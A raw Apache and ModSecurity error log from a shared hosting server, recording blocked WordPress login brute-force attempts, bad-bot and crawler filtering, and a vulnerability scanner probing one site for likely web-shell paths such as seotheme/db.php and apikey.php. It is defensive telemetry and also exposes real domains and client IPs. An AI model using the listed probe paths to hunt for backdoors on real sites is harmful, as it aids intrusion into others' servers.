[Tue May 26 17:49:17.100845 2026] [autoindex:error] [pid 937900:tid 938150] [client 43.153.27.244:46258] AH01276: Cannot serve directory /home1/micro3e1/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:49:17.850679 2026] [security2:error] [pid 937900:tid 938138] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPxU4hPNS8CpkGLtbFdwAAAPE"]
[Tue May 26 17:49:19.074319 2026] [security2:error] [pid 937900:tid 938145] [client 202.76.191.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPxk4hPNS8CpkGLtbFlQAAAPg"]
[Tue May 26 17:49:19.251286 2026] [security2:error] [pid 937900:tid 938155] [client 173.239.240.59:26449] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 59.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahWPxk4hPNS8CpkGLtbFoAAAAQI"]
[Tue May 26 17:49:19.836636 2026] [security2:error] [pid 937900:tid 938115] [client 173.239.240.35:48141] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahWPx04hPNS8CpkGLtbFtAAAANo"]
[Tue May 26 17:49:20.057910 2026] [security2:error] [pid 937900:tid 938071] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPx04hPNS8CpkGLtbFtwAAAK4"]
[Tue May 26 17:49:21.430817 2026] [security2:error] [pid 937900:tid 938104] [client 173.239.240.41:23239] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahWPxk4hPNS8CpkGLtbFowAAAM8"]
[Tue May 26 17:49:22.404148 2026] [security2:error] [pid 937900:tid 938124] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPyU4hPNS8CpkGLtbF9AAAAOM"]
[Tue May 26 17:49:22.599808 2026] [security2:error] [pid 937900:tid 938098] [client 192.126.188.185:57793] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWPyk4hPNS8CpkGLtbF9QAAAMk"], referer: https://anujtradingco.com
[Tue May 26 17:49:24.570353 2026] [security2:error] [pid 937900:tid 937980] [remote 51.91.98.45:41692] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWPzE4hPNS8CpkGLtbGMAAAoU8"]
[Tue May 26 17:49:24.698111 2026] [security2:error] [pid 937900:tid 938136] [client 106.202.46.230:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahWPzE4hPNS8CpkGLtbGRQAAAO8"]
[Tue May 26 17:49:24.698445 2026] [security2:error] [pid 937900:tid 938061] [client 106.202.46.230:47212] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahWPzE4hPNS8CpkGLtbGQwAAAKQ"]
[Tue May 26 17:49:24.928046 2026] [security2:error] [pid 937900:tid 938036] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPzE4hPNS8CpkGLtbGPAAAAIs"]
[Tue May 26 17:49:26.683870 2026] [security2:error] [pid 937900:tid 938106] [client 104.207.48.203:37029] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "consultrgb.com"] [uri "/"] [unique_id "ahWPzk4hPNS8CpkGLtbGhQAAANE"]
[Tue May 26 17:49:27.040222 2026] [security2:error] [pid 937900:tid 938056] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPzk4hPNS8CpkGLtbGgwAAAJ8"]
[Tue May 26 17:49:27.831681 2026] [security2:error] [pid 937900:tid 938083] [client 104.207.56.0:36597] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "consultrgb.com"] [uri "/wp-login.php"] [unique_id "ahWPz04hPNS8CpkGLtbGmAAAALo"]
[Tue May 26 17:49:28.824255 2026] [security2:error] [pid 937900:tid 938099] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWP0E4hPNS8CpkGLtbGsAAAAMo"]
[Tue May 26 17:49:30.451031 2026] [security2:error] [pid 937900:tid 938034] [client 194.187.176.184:64134] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahWP0k4hPNS8CpkGLtbG4AAAAIk"]
[Tue May 26 17:49:31.284854 2026] [security2:error] [pid 937900:tid 938112] [client 194.187.176.210:44186] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahWP004hPNS8CpkGLtbG9QAAANc"]
[Tue May 26 17:49:31.384259 2026] [security2:error] [pid 937900:tid 938133] [client 193.37.33.150:45313] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahWP004hPNS8CpkGLtbG9AAAAOw"]
[Tue May 26 17:49:31.710321 2026] [security2:error] [pid 937900:tid 938052] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWP004hPNS8CpkGLtbG-QAAAJs"]
[Tue May 26 17:49:33.376191 2026] [autoindex:error] [pid 937900:tid 938045] [client 124.156.157.91:35132] AH01276: Cannot serve directory /home1/midrie34/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:49:33.584134 2026] [security2:error] [pid 937900:tid 938133] [client 167.235.143.113:32956] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWP1U4hPNS8CpkGLtbHNgAAAOw"], referer: http://ucdc.co.in/
[Tue May 26 17:49:34.149588 2026] [security2:error] [pid 937900:tid 937934] [remote 84.247.181.196:47974] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.181.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWP1U4hPNS8CpkGLtbHTgAA5iE"]
[Tue May 26 17:49:34.208242 2026] [security2:error] [pid 937900:tid 938081] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWP1U4hPNS8CpkGLtbHSgAAALg"]
[Tue May 26 17:49:35.828922 2026] [security2:error] [pid 937900:tid 938086] [client 216.41.233.203:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWP104hPNS8CpkGLtbHhgAAAL0"], referer: https://www.anujtradingco.com/
[Tue May 26 17:49:36.459643 2026] [security2:error] [pid 937900:tid 938131] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWP2E4hPNS8CpkGLtbHjAAAAOo"]
[Tue May 26 17:49:37.337460 2026] [security2:error] [pid 937900:tid 938068] [client 216.41.233.203:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWP2U4hPNS8CpkGLtbHqgAAAKs"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1418267&moderation-hash=9be30dabce180487f5f9cabe7d60938d
[Tue May 26 17:49:38.169714 2026] [security2:error] [pid 937900:tid 938077] [client 85.208.96.196:42930] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/september-16th/list/"] [unique_id "ahWP2k4hPNS8CpkGLtbHwgAAALQ"]
[Tue May 26 17:49:38.169893 2026] [security2:error] [pid 937900:tid 938077] [client 85.208.96.196:42930] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/september-16th/list/"] [unique_id "ahWP2k4hPNS8CpkGLtbHwgAAALQ"]
[Tue May 26 17:49:38.734317 2026] [security2:error] [pid 937900:tid 938153] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWP2k4hPNS8CpkGLtbHzAAAAQA"]
[Tue May 26 17:49:39.487102 2026] [security2:error] [pid 937900:tid 938142] [client 161.142.152.122:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWP204hPNS8CpkGLtbH7gAAAPU"], referer: https://www.anujtradingco.com/
[Tue May 26 17:49:40.418253 2026] [security2:error] [pid 937900:tid 938095] [client 216.41.233.203:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWP3E4hPNS8CpkGLtbIBwAAAMY"], referer: https://anujtradingco.com
[Tue May 26 17:49:40.682468 2026] [security2:error] [pid 937900:tid 938031] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWP3E4hPNS8CpkGLtbH_wAAAIY"]
[Tue May 26 17:49:41.004585 2026] [security2:error] [pid 937900:tid 938100] [client 20.206.67.134:6289] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/wp-plain.php"] [unique_id "ahWP3U4hPNS8CpkGLtbIGwAAAMs"], referer: www.google.com
[Tue May 26 17:49:41.050142 2026] [security2:error] [pid 937900:tid 938079] [client 20.206.67.134:4669] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWP3U4hPNS8CpkGLtbIHwAAALY"], referer: www.google.com
[Tue May 26 17:49:41.705286 2026] [security2:error] [pid 937900:tid 938035] [client 20.206.67.134:9563] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWP3U4hPNS8CpkGLtbINAAAAIo"]
[Tue May 26 17:49:41.750150 2026] [fcgid:warn] [pid 937900:tid 938077] (70014)End of file found: [client 66.132.224.238:30004] mod_fcgid: can't get data from http client
[Tue May 26 17:49:42.289758 2026] [security2:error] [pid 937900:tid 938064] [client 161.142.152.122:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWP3k4hPNS8CpkGLtbISwAAAKc"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1430896&moderation-hash=683babac959ef6b0812e0407a9e1141b
[Tue May 26 17:49:42.863876 2026] [security2:error] [pid 937900:tid 938136] [client 34.195.16.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWP3k4hPNS8CpkGLtbIWgAAAO8"]
[Tue May 26 17:49:43.537060 2026] [security2:error] [pid 937900:tid 938060] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWP304hPNS8CpkGLtbIZgAAAKM"]
[Tue May 26 17:49:44.071875 2026] [security2:error] [pid 937900:tid 938064] [client 20.206.67.134:6298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/dxkalwip.php"] [unique_id "ahWP4E4hPNS8CpkGLtbIhAAAAKc"], referer: www.google.com
[Tue May 26 17:49:44.244762 2026] [security2:error] [pid 937900:tid 938039] [client 20.206.67.134:9555] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWP4E4hPNS8CpkGLtbIhQAAAI4"]
[Tue May 26 17:49:44.877585 2026] [security2:error] [pid 937900:tid 938005] [remote 193.42.61.12:59380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWP4E4hPNS8CpkGLtbIlQAAsGg"]
[Tue May 26 17:49:44.943848 2026] [security2:error] [pid 937900:tid 938041] [client 20.206.67.134:6289] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWP4E4hPNS8CpkGLtbImgAAAJA"], referer: www.google.com
[Tue May 26 17:49:45.740914 2026] [security2:error] [pid 937900:tid 938094] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWP4U4hPNS8CpkGLtbIqAAAAMU"]
[Tue May 26 17:49:46.393445 2026] [security2:error] [pid 937900:tid 938064] [client 20.206.67.134:1158] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/wp-plain.php"] [unique_id "ahWP4k4hPNS8CpkGLtbIwgAAAKc"], referer: www.google.com
[Tue May 26 17:49:47.343613 2026] [security2:error] [pid 937900:tid 938143] [client 20.206.67.134:5449] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahWP404hPNS8CpkGLtbI6AAAAPY"]
[Tue May 26 17:49:47.717123 2026] [security2:error] [pid 937900:tid 938103] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWP404hPNS8CpkGLtbI5gAAAM4"]
[Tue May 26 17:49:48.795334 2026] [security2:error] [pid 937900:tid 938031] [client 74.7.241.151:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "webmail.stockmarketanalysis.in"] [uri "/___proxy_subdomain_webmail/cgi-sys/404.html"] [unique_id "ahWP5E4hPNS8CpkGLtbJEAAAAIY"]
[Tue May 26 17:49:48.795937 2026] [security2:error] [pid 937900:tid 938090] [client 74.7.241.151:38476] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "webmail.stockmarketanalysis.in"] [uri "/___proxy_subdomain_webmail/robots.txt"] [unique_id "ahWP5E4hPNS8CpkGLtbJDgAAwQk"]
[Tue May 26 17:49:49.559126 2026] [security2:error] [pid 937900:tid 938069] [client 20.206.67.134:6309] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/auvitejq.php"] [unique_id "ahWP5U4hPNS8CpkGLtbJKgAAAKw"], referer: www.google.com
[Tue May 26 17:49:49.749174 2026] [security2:error] [pid 937900:tid 938106] [client 20.206.67.134:4625] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahWP5U4hPNS8CpkGLtbJLwAAANE"]
[Tue May 26 17:49:50.592692 2026] [security2:error] [pid 937900:tid 938104] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWP5k4hPNS8CpkGLtbJPAAAAM8"]
[Tue May 26 17:49:51.491513 2026] [security2:error] [pid 937900:tid 937941] [remote 178.156.182.155:49702] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWP504hPNS8CpkGLtbJVQAAqCg"]
[Tue May 26 17:49:51.758174 2026] [security2:error] [pid 937900:tid 938144] [client 161.142.152.122:24089] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWP504hPNS8CpkGLtbJVAAAAPc"], referer: https://anujtradingco.com
[Tue May 26 17:49:52.226499 2026] [security2:error] [pid 937900:tid 938051] [client 114.119.145.140:58577] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "senoro.com.mx"] [uri "/5722sirkm35738dr629220"] [unique_id "ahWP6E4hPNS8CpkGLtbJYwAAAJo"], referer: https://senoro.com.mx/5722sirkm35738dr629220
[Tue May 26 17:49:52.737006 2026] [security2:error] [pid 937900:tid 938146] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWP6E4hPNS8CpkGLtbJbAAAAPk"]
[Tue May 26 17:49:54.257864 2026] [security2:error] [pid 937900:tid 938105] [client 81.22.193.189:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWP6k4hPNS8CpkGLtbJmwAAANA"], referer: https://www.anujtradingco.com/
[Tue May 26 17:49:54.663774 2026] [security2:error] [pid 937900:tid 938032] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWP6k4hPNS8CpkGLtbJngAAAIc"]
[Tue May 26 17:49:55.594668 2026] [security2:error] [pid 937900:tid 938065] [client 81.22.193.189:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWP604hPNS8CpkGLtbJxwAAAKg"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1431741&moderation-hash=49c10c23b02da98e066105372b2c9381
[Tue May 26 17:49:56.122379 2026] [security2:error] [pid 937900:tid 938155] [client 91.169.4.153:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWP604hPNS8CpkGLtbJzAAAAQI"]
[Tue May 26 17:49:57.419357 2026] [security2:error] [pid 937900:tid 938035] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWP7U4hPNS8CpkGLtbJ7gAAAIo"]
[Tue May 26 17:49:59.353053 2026] [security2:error] [pid 937900:tid 938149] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWP7k4hPNS8CpkGLtbKIgAAAPw"]
